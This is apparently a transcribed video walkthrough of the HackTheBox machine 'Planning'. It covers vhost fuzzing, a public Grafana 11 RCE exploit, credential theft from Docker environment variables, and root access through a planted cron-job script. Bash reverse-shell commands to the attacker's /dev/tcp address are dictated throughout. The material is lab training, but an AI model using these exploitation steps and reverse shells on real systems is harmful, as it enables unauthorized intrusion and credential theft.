Sup guys, welcome to today's video, and today I'm going to be running through with you planning on HackTheBox. This is an easy box, Linux based. Let's get right into it. Also, I've been gone for a while, but I'm back now, so hit up my Discord in the description if you want to stay up, keep in line with the community. HackTheBox took me down because I cracked a bunch of boxes that weren't released yet, so they took my YouTube off me. But I am now back, so let's get into it. Alright, so we're on planning right now. Let me just double check I'm recording my screen. Yeah, I'm recording my screen. So this is planning. We got our live IP address. First port of call is we want to make sure the IP is live. There we go. We gain a ping response. Total time to live is 63, which indicates it's a Linux box. If that's about 128, it's probably Windows. Let's get into it then. So let's just make a little directory called planning, cd planning. Want to do an nmap scan to see what's open. I'm just using all default flags and stuff here. Stealth scan, verbose output, saving it as nmap.txt, and we drop in the pings. Here we go. Bam. I'll make this terminal output bigger so it looks better. Okay, we got our response back from nmap. We can see here we've got port 22 open, SSH, and we've got port 80 open. It's quite uncommon with easy boxes for there to be any sort of exploits on SSH, so I'm gonna ignore that, and looks all up to date, so let's ignore that and go straight for the website. So we got this website here running on port 80, and it's a Nginx server version 1.24. So let's go for that. One second, I've already got it in my host file, so I just have to go /hosts. I need to find where planning is. We got an email here, info@planning.htb. I have already been through this box and I've made detailed notes, but I'll just kind of run through with you the sort of things you want to be looking for on the easier boxes. So we've got a little credential there. Can't see anything obvious here, it just looks like a generic educational platform. Okay. So you can try directory fuzzing, and you can try looking for virtual hosts. In this instance, we'll go straight to the bare and bones of it because I know you want a quick walkthrough. So locate combined subdomains. This is going to be a subdomain word list from circ lists. This is quite a comprehensive one. This is good. So we want to use FUF, but we want to use it looking for want to use it looking for vhosts, not directory fuzzing in a traditional sense. So okay, I'll fuck that up a little bit. Boom, there we go, we have a hit on Grafana for the vhost. So we've already got planning.htb, add Grafana at the beginning, that's grafana.planning.htb. So we can go ahead and add that to our host file. One thing that's pretty important here is you need to understand the power of enumeration, because when I was going through this box blind, there was a lot of word lists that I ran on the directories and on the vhost side. Generally, I'd say this is a pretty good word list to go for if you're looking for vhosts, because it's quite big, quite large, complex. But I mean, really, you just have to throw everything in the kitchen sink at it. Just throw as many word lists as you can, because they give you a limited attack surface on purpose, because they want you to just enumerate. So now we've got grafana.planning.htb, we've added that to the host file. So now if we go to that in our browser, here we can see we've got this Grafana login page. Now if you look, there's two things to notice here. Firstly, it says Grafana version 11 down here. So if they're giving you versions on login pages, that's usually an inclination that they want you to look into whether or not there's any exploits for that. So, and also we've got these login credentials here, so we can use these to get into Grafana. My bad, I had a space at the beginning of admin. I should have just typed that in. Okay, Grafana is our open source platform to create interactive dashboards. These are used for visualizing various metrics and traces. So, alerts, data types, system health, other visualizations. Okay, that's pretty interesting. So on this box, as I believe, so now that we're in as the admin on this box, I remember we were looking around for exploits specifically for Grafana. So we might have done a search exploit search. Okay, here all we've got coming up in search exploit is things that affect 7 to 6. Some of these won't be applicable. Denial of service, that's not interesting to us. Trying to piece together how I found the exploit for this. Okay, Grafana version 11 remote code execution. Is this the one? Yep, this is the right CVE. So, Python script that exploits a remote code execution in Grafana's SQL expression feature by leveraging insufficient input sanitization. This allows an attacker to execute arbitrary shell commands on the server. So that's the right one. Let's look for all different versions of it on here. I think I like this one the most when I was going through them. I tend to look for Python scripts anyway. So yeah, let's grab this. Git clone. And so before we try and install the requirements, let's just see if it runs. Okay, no, we need to install the requirements. Okay. Pip3 install attacker requirements.txt. Okay, there we go. Let's try it again. There we go. It's asking us for the usage parameters now because we've installed the dependencies. So let's go through this. So user, we've been given the credentials from HackTheBox admin. I'll type it in this time. And then we want our password, which is yeah. And then it says tax C command. So in this instance we can just go for a classic bash reverse shell. So that's bash tag I in double quotes, and oh no, sorry, my bad, it's bash tag C and then it's double quotes, it's bash tag I. And it's /dev /tcp your IP address 10.10 0 and 1. There we go. And then just we want to use the host, the URL, sorry. It says the URL on the end, so http grafana.planning.htb, and as we execute that, just run a netcat listener on our end to pick up the connection if we get one. Oh, my bad. It's because I've done a single query here. And there we go. That was successful. Had a bit of a technical issue there, guys, but I am now back. So we can see that we've got a shell. We are the root user. This should send off alarms in our head because we're not going to be the root user yet. We need to escalate privilege. So we got to work out where we're at right now. So groups, host name, PS orgs. Here we go. If we look at what processes we're currently running, see the root user process ID 1, Grafana server, and here packaging is Docker, which means we are in a Docker container. So the whole goal now is for us to get out of the Docker container. Now these can get pretty complex. I'll do some medium boxes, do some stuff on proving grounds too, but in this instance, as it's an easy box, the answer was kind of staring you in the face the whole time. If you haven't done this box yet, I think you should just like poke around, look around for an answer a little bit, but as this is a walkthrough, I'll cut straight to the point. So basically, if you run env inside a Docker container, it'll show you the environment variables. This is basically the variables that were in place when the container was started. So this is a way to like configure a container at runtime. So this can include things like database credentials, API keys, or passwords. So env just basically gives you a overview of the current container. Then it might contain credentials. So something to add to your notes in the future when you're looking at Docker escape and enumerating Docker, because it just gives you important stuff anyway. Because you can see we've run host name earlier, obviously we've got all that there, password, but if you look down here we can see password. We've got GF security admin password, we've got GF security admin user Enzo. Now, as we've got SSH open here, the normal port of call will be check SSH, see if you can log in with the credentials provided. If not, you would have had to look into Docker Container Escape a little bit more. But for me, I did it the other way around. I was enumerating the Docker container like crazy, when really I just had to enumerate the environment a little bit more, and the answers were right there. So we got this Enzo. Yep. Grab Enzo's password. And we can see we're in as our friend Enzo. Groups Enzo, ls Enzo. There's the user.txt file. I'm not going to cut it because I don't want HackTheBox to take my account off me again. So the next port of call for us is looking at how to escalate privilege. So my first port of call is sudo l. This will allow me to see what I can run as sudo. Once my password again. That eliminates that from the running. It says, sorry, Enzo may not run sudo on planning. You can look for the SUID binaries. When I was going through it, I already exhausted that path. So umount, sudo, password, everything I could bind. Checking at the version of sudo. Sudo 19.5. Okay. Yep, I was checking out the version of sudo in this one. Couldn't find anything appropriate. As you can see, it's sudo 1.9.15. We got a bunch of sudo exploits, but none of them worked in this instance. Now, what I normally do here, I've tried to, as I'm preparing to get some certifications, I try not to use linpiece or avoid on automated scripts. I mean, rely on automated scripts too much. So I was looking for database files, as I believe. So find on the entire system files to contain the name .db. Permission denied, which doesn't lead to a very beautiful output, but you can quickly peruse, or you can just get a script that removes the permission denied. But here there was this opt crontabs.db. So crontabs just processes that run in the background. If you want to learn more about this, I'd definitely suggest HackTheBox Academy, because they've got a whole Linux privilege escalation where they deal with the various vectors that you should be looking for here. and they apply to most easy boxes. Saving a Docker image to var/backups grafana.tar. It's using gzip to compress it, and it's zipping with a password, which is this. So we want to look at all the TCP ports and the UDP ports that are listening on the machine. In this instance, what you want to do is forward the port from this machine that Enzo is running, and you want to forward it to your own. So SSH. So you log in as usual. And then you go tac L 1 2 3. You go 8 1 2 3. And then we're going to run localhost because we want this to run on our machine. And then we're going to put the port again. 1 2 3. Then it will ask us to log in as Enzo. Enzo's password's here. Now if we go on our machine, there we go. Sorry, I've got Bloodhound running my bud. Here we go. So this site is asking you to sign in. So if we look at the contents that we had in our cat opt cron tab, the thought process here was this was obviously your new password. The cleanup commands coming from here, so login will be root and then this. Here we go. So we found this cron jobs tab. So essentially, if you deploy a script with a reverse shell command in it and you execute it from here as root and you send that reverse shell command back to you, you're going to have a shell as the root user. So if we click at new cron jobs that we can create here, just give it a play command. So let's look at the format of these ones for a second. So we can just mimic this format. So the name doesn't really matter. This is the script that it's running, the .sh script in root. Obviously we can't access that, we can't edit that, so we can't put any shells in there because it's owned by the root and we're not the root user. But what we can do is put a script in our home directory that will be executed via this cron job tab, and put a reverse bash shell command in there. So when this cron is executed as root, we get a shell as root. So just to go simply, go back to Enzo's home. See Enzo. So Enzo has read, write, execute privileges in his home, which you would expect. You can just create a script in here with a bash reverse shell, just like we had in our command earlier. Bin slash bash, there we go. Let's do it again. Bash tac I and slash dev slash tcp slash your IP address. Free and 0 and 1. And that should work. Yeah. chmod plus x ref.sh. So we're listening on that listener now. Let's try it again. Home slash Enzo ref.sh. Let's try it again. Slash home slash Enzo slash ref.sh. There we go. That worked. So bang, there you go guys. Thanks for watching. As I said, I've been gone for a while, but I'm going to be back. I've done most of the boxes, well, a bunch of the boxes on easy, and a few of the medium ones on HackTheBox, so I'll be doing tutorials for that. I'm a little bit rusty, I think, but I'll get back into my stride, and yeah, check out the Discord below. I'm not trying to sell you courses, and I ain't trying to make money. I just do this shit for fun. Peace out.